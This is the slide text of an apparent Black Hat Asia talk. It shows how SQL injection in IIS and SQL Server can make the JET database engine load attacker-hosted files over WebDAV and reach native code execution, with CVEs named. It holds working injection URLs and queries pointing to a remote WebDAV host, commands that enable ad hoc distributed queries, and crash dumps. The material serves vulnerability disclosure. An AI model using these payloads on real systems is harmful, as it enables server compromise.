SQL Injection IIS
SQL Injection IIS
#BHASIA @BLACKHATEVENTS
Agenda
• Who are we
• Introduction: motivation and background
• A new remote attack surface in IIS and SQL Server
• Three attack scenarios
• Attack IIS with a SQL injection in Access database - demo
• Attack SQL Server with a SQL injection in SQL Server database - demo
• Attack IIS with a web shell [bonus] - demo
• Summary
Who Are We
• We are security researchers from Palo Alto Networks
• Tao Yan (@Ga1ois)
• Qi Deng
• Bo Qu
• Regular conference presenter
• Black Hat, CanSecWest, Blue Hat, Recon, POC, HITCON, etc
• Regular top vulnerability contributor for Microsoft, Adobe, Apple, etc
• Several times in MSRC TOP 10 Researchers
Agenda
• Who are we
• Introduction: motivation and background
• A new remote attack surface in IIS and SQL Server
• Three attack scenarios
• Attack IIS with a SQL injection in Access database - demo
• Attack SQL Server with a SQL injection in SQL Server database - demo
• Attack IIS with a web shell [bonus] - demo
• Summary
Motivation and background
• Is there any new attack surface in IIS and SQL Server?
• Can SQL injection only be used to view data in the database?
• What is Microsoft JET database engine and who can use it?
Motivation and background
• Attack surfaces in IIS and SQL Server are very limited.
Motivation and background
• What is SQL Injection?
• Execute unintended SQL queries in the target database.
• What we previously know SQL injection can do?
• View data in the database.
• What we previously know SQL injection can NOT do?
• Execute native code in the web application or database process.
• Execute shell commands or read/write arbitrary files if not having high
privileges in specific databases. (such as xp_cmdshell with sa in SQL Server)
Motivation and background
• Microsoft JET database engine
• ~30 years old and not well maintained, but still massively used.
• Natively supported on all Windows versions.
Who can use Microsoft JET database engine?
• Office is not an ideal target.
• Neither is wscript.exe.
Motivation and background
• How about combine all of those 3 topics together?
• Is it possible to use vulnerabilities in JET database engine to attack IIS
and SQL Server by executing arbitrary SQL queries in remote
controllable database based on the SQL injection and get native code
execution capability in IIS and SQL Server process?
Agenda
• Who are we
• Introduction: motivation and background
• A new remote attack surface on IIS and SQL Server
• Three attack scenarios
• Attack IIS with a SQL injection in Access database - demo
• Attack SQL Server with a SQL injection in MSSQL database - demo
• Attack IIS with a web shell [bonus] - demo
• Summary
Cross Database SQL Query in Access and SQL
Server
Access
Select * from [ExternalDatabase][table]
SQL Server
SELECT * FROM opendatasource('provider', 'data source=ExternalDatabase ')...[table]
EXEC sp_addlinkedserver
@server = ‘ServerName',
@srvproduct = ‘ServerProduct',
@provider = ‘provider',
@datasrc = ‘ExternalDatabase',
@provstr = ‘ProviderString';
External database and provider
• External Database can be a different database type, such as JET
database? Access:
use JET Provider by default: msjet40.dll
msjet40!ErrOpenDatabase msjet40!ErrOpenForeignDatabase
Coml2!StgOpenStorage
UNC path kernel32!CreateFileW Coml2!DfOpenDocFile
Coml2!DfFromName
Coml2!CFileStream::InitWorker
Coml2!CFileStream::Init_OpenOrCreate
UNC path parsing in acecore (msjet 12.0)
The hidden feature for CreateFile(UNC) in IIS and SQL Server
Asp code
const strDBPath ="database/#data.mdb"
set conn = server.createobject("adodb.connection")
conn.open "DRIVER={Microsoft Access Driver (*.mdb)};DBQ="+server.mappath(strDBPath)+";pwd="
id=request("id")
sql="select * from product where id="&id id=1513 and (SELECT [fc4] FROM [Excel
set rs=conn.execute(sql) 8.0;Database=\\10.2.156.63/webdav/poc237.xls].[ft8])
sql = select * from product where id=1513 and (SELECT [fc4] FROM
[Excel 8.0;Database=\\10.2.156.63/webdav/poc237.xls].[ft8])
Cross database query call stack in IIS + ASP + Access
odbc32+odbcjt32
msado15+msdasql
vbscript
asp
SQL Injection in SQL Server with cross database query
Asp code
set conn = server.createobject("adodb.connection")
conn.open "provider=sqloledb;data source=DESKTOP-32BIT\SQLEXPRESS;uid=test;pwd=123456;database=testdb"
id=request("id")
sql="select * from persons where personid="&id id=1;UPDATE opendatasource('Microsoft.ACE.OLEDB.12.0',
set rs=conn.execute(sql) 'data source=\\10.2.156.63\webdav\poc42cf.mdb')...[ft8] SET
[fc3] = [fc3] + 47774 WHERE [fc3] <= 7 OR [fc2] <= 5;
msjetoledb40
oledb32
sqllang
sqldk
Msjet 12.0 Acecore cross database query call stack in SQL Server
Aceoledb + Acecore
oledb32
Sqllang + sqlmin
sqldk
A new remote attack surface on IIS and SQL Server
• The new attack surface
• The capability of executing any SQL query on any attacker controllable
database in IIS and SQL Server based on a SQL Injection.
• Fuzzing based on the mutations on SQL queries and JET database files.
• The code development and testing are based on the correct database file.
• It is a huge gold mine, we have found ~100 vulnerabilities here.
• Limitations
• Only select query is available in Access database.
• Acecore is not installed by default.
Agenda
• Who are we
• Introduction: motivation and background
• A new remote attack surface on IIS and SQL Server
• Three attack scenarios
• Attack IIS with a SQL injection in Access database - demo
• Attack SQL Server with a SQL injection in SQL Server database - demo
• Attack IIS with a web shell [bonus] - demo
• Summary
Scenario 1: IIS + Access
http://127.0.0.1/access_injection.asp?id=1513
%20and%20(SELECT TOP 44 [ft4].[fc3] AS [c01]
FROM
[\\10.2.156.63/webdav/poc7c.mdb].[ft4]
WHERE [ft4].[fc3] <> 2 GROUP BY [ft4].[fc3])
Scenario 1: IIS + Access, CVE-2021-XXXX
6a0e166a lea eax,[esi+34h] <-- esi is the TableMover object
6a0e166d je msrd3x40!TableMover::RecordAddress+0x59 (6a0e1679)
6a0e166f cmp dword ptr [esi+10h],0
6a0e1673 je msrd3x40!TableMover::RecordAddress+0x1f3 (6a0e1813)
6a0e1679 push eax
6a0e167a push dword ptr [esi+0Ch]
6a0e167d mov ecx,edi
6a0e167f call msrd3x40!DataPage::RecordAddress (6a0bb410) <-- esi+0x34 was set in it
6a0e1684 cmp eax,4 <-- eax=1 when 0x4800
6a0e1687 ja msrd3x40!TableMover::RecordAddress+0x148 (6a0e1768)
6a0e168d jmp dword ptr msrd3x40!TableMover::RecordAddress+0x288 (6a0e18a8)[eax*4]
6a0e1694 mov eax,dword ptr [esi+34h] <-- eax is from esi+0x34; jump case 1
6a0e1697 lea ebx,[esi+24h]
6a0e169a mov ecx,ebx
6a0e169c mov edi,dword ptr [eax] ds:002b:26de7000=????????
Scenario 1: IIS + Access, CVE-2021-XXXX
msrd3x40!TableMover à before msrd3x40!TableMover à after
0b7e4fb8 6a0a63cc 15302e90 00000000 0000ff02 0b7e4fb8 6a0a63cc 15302e90 00000000 0000ff02
0b7e4fc8 00000000 26dd2cd4 26de6800 00000001 0b7e4fc8 00000000 26dd2cd4 26de6800 00000001
0b7e4fd8 c0c0c0c0 00000000 00000000 c0c0c0c0 0b7e4fd8 c0c0c0c0 00000000 00000000 c0c0c0c0
0b7e4fe8 c0c0c0c0 00000000 00000000 00000000 0b7e4fe8 c0c0c0c0 26de7000 00000000 00000000
0b7e4ff8 00000000 0b7e4ff8 00000000
0:020:x86> !address 26de6800
Usage: <unknown>
Base Address: 00000000`26dd0000
0:020:x86> db 26de6800 End Address: 00000000`26de7000
26de6800 09 01 d6 07 14 00 00 00-10 00 00 c8 00 c8 00 48
26de6810 00 c8 00 c8 00 c8 00 c8-00 c8 00 c8 00 c8 00 c8
26de6820 00 c8 00 c8 00 c8 00 c8-00 c8 00 ff ff 00 00 00
26de6830 00 00 00 00 00 00 00 00-00 00 12 00 00 00 00 00
26de6840 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
26de6850 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
26de6860 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
26de6870 00 00 00 61 72 74 6c 61-72 2e 53 00 00 00 00 00
How to find CVE-2021-XXXX
• SELECT TOP 44 [ft4].[fc3] AS [c01] FROM
[\\10.2.156.63/webdav/poc7c.mdb].[ft4] WHERE [ft4].[fc3] <> 2
GROUP BY [ft4].[fc3]
• Power of database file mutations
original mutative
CVE-2021-XXXX Demo
Scenario 2: IIS + SQL Server
Database Target Database Vulnerable Supported SQL Trigger Security boundary
requirement privilege in SQL components
Injection
SQL SQL Injection public with ad All JET All SQL queries, One From a SQL injection in
Server hoc enabled or components: multiple query single SQL Server to SQL Server
32bit Default setup SA to enable ad msjet40, statements, web DoS, info leak or RCE with
hoc to access the msrd3x40, action query request MSSQLSERVER user in
remote database msexcl40, and across table sqlservr.exe process.
acecore, etc query
SQL SQL Injection public with ad acecore ALL SQL One
Server hoc enabled or queries, single
64bit Access SA to enable ad multiple query web
Redistributable hoc to access the statements, request
installed remote database action query
and across table
query
Scenario 2: IIS + SQL Server, CVE-2020-1711
http://127.0.0.1/mssql_injection.asp?id=1;exec%20
sp_configure%20%27show%20advanced%20options
%27,%201;RECONFIGURE;exec%20sp_configure%20
%27Ad%20Hoc%20Distributed%20Queries%27,%20
1;RECONFIGURE;UPDATE%20opendatasource(%27
Microsoft.ACE.OLEDB.12.0%27,%20%27data%20sou
rce=\\10.2.156.63\webdav\poc42cf.mdb%27)...[ft8]
%20SET%20[fc3]%20=%20[fc3]%20%2b%2047774%
20WHERE%20[fc3]%20%3C=%207%20OR%20[fc2]%
20%3C=%205;
Scenario 2: IIS + SQL Server, CVE-2020-1711
After overflow Before overflow
0:000> dd 1ca2efd8 0:000> dc 1ca2efd8
1ca2efd8 1ca2f020 00000039 00000fdc 1ca2f000 1ca2efd8 1ca2f020 00000039 00000fdc 1ca2f000 ...9...........
1ca2efe8 00000020 00000000 37a30afc 1b001b04 1ca2efe8 00000020 00000000 1ca2effc 00000004 ...............
1ca2eff8 1b001b00 1b001b00 1b001b00 1b001b00 1ca2eff8 00000000 00000000 00000000 00000000 ................
1ca2f008 1b001b00 1b001b00 1b001b00 1b001b00 1ca2f008 00000000 00000000 00000000 00000000 ................
1ca2f018 1b001b00 1b001b00 1b001b03 19ff1b00 1ca2f018 00000000 00000000 00000003 feff0000 ................
1ca2f028 4d314931 4f324c33 53375135 4c355137 1ca2f028 32312e30 34323133 38373635 31353637 0.12312456787651
1ca2f038 50334f32 52355134 4bff1a32 4e324c2e 1ca2f038 35333432 37353634 30feff32 3332312e 243546572..0.123
1ca2f048 50344d31 52385236 4d315036 4f354e34 1ca2f048 35343231 37383736 32313536 34353334 1245678765124354
1ca2f058 4d375036 4c354f33 4e354f33 4e345132 1ca2f058 32373536 31353433 33353433 33343632 6572345134532643
1ca2f068 49004337 01002100 00000700 00000000 1ca2f068 2e002837 01000600 00000700 00000000 7(..............
0:000>
eax=1c9d1f38 ebx=1ca28e50 ecx=1c9b7800 edx=1c9b7800 esi=1ca2efd8 edi=028fda0c
eip=5bdd0ce9 esp=028fd974 ebp=028fd98c
ACECORE+0x20ce9:
5bdd0ce9 8b7810 mov edi,dword ptr [eax+10h] ds:002b:1c9d1f48=0000003e
0:000> dc 1c9d1f38
1c9d1f38 5bf0f5fc 1c9d1f78 00000006 00000003 ...[x...........
1c9d1f48 0000003e 00000004 00000003 00000409 >...............
1c9d1f58 00010000 c0c0c0c0 00000000 00000000 ................
1c9d1f68 1c9b7e40 1c9b7800 00000000 00000000 @~...x..........
1c9d1f78 00630066 00000033 c0c0c0c0 c0c0c0c0 f.c.3...........
How to find CVE-2020-1711
• UPDATE opendatasource(‘Microsoft.ACE.OLEDB.12.0’, ‘data
source=\\10.2.156.63\webdav\poc42cf.mdb’)...[ft8] SET [fc3] = [fc3] +
47774 WHERE [fc3] <= 7 OR [fc2] <= 5
• Power of mutations on the database file
mutative original
CVE-2020-1711 Demo
Scenario 3: IIS + Web Shell
0:000> dd 1ff46fd8
1ff46fd8 1ff47020 0000044e 00000fdc 1ff47000
1ff46fe8 00000020 00000000 1ff46ffc 00000004
1ff46ff8 00000000 00000001 0000001f 00000000
1ff47008 00000000 00000000 00000000 00000000
1ff47018 00000000 00000000 9c400006 00000000
1ff47028 000a0000 00000000 00000000 00000000
Scenario 3: IIS + Web Shell, CVE-2020-17062
memcpy((void *)(v5 + (*(_WORD *)(v5 + 2 * 0 + 14) & 0x3FFF)), 0x1ff47020, 0x44e);
• Heap grooming
• Execute multiple queries in
one database connection
• Try/catch each query in web
shell
CVE-2020-17062 Demo
Vulnerabilities in three attack scenarios
• Old
• From WinXP to Win10, over 20 years.
• Easy
• Weak or no mitigations: no CFG in msjet40.dll, msrd3x40.dll, acecore x86, etc
• Severe
• Get RCE with SYSTEM privilege remotely from code execution as
DefaultAppPool or MSSQLSERVER with SeImpersonatePrivilege capability with
token kidnapping.
• Microsoft did NOT treat NETWORK/LOCAL Service to SYSTEM as a security
boundary.
Summary
• Feature or vulnerability?
• Webdav feature opens a new world for attackers to remotely attack IIS and
SQL Server and makes it as easy as locally attacking Microsoft JET database
engine when there is a SQL injection. A great number of new vulnerabilities
were found in Microsoft JET database engine and could be used to attack IIS
and SQL Server.
• Backwards compatibility is bad.
• All Windows systems released in last decades including WIP(Windows Insider
Preview) are compatible with the ~30 years old Microsoft JET database engine.
• Defense and mitigation
• Pay more attention to webdav.
One more thing
• Security boundary
• JET vulnerabilities make “SQL query execution (on controllable JET database)”
equal “native code execution”.
• remote attack surface
• SQL query execution (on controllable JET database) in IIS/SQL Server = native code
execution in IIS/SQL Server
• from SQL Injection to remote SYSTEM.
• local attack surface
• ???
Acknowledge
• Thanks to Zhibin Zhang
Q&A
#BHASIA @BLACKHATEVENTS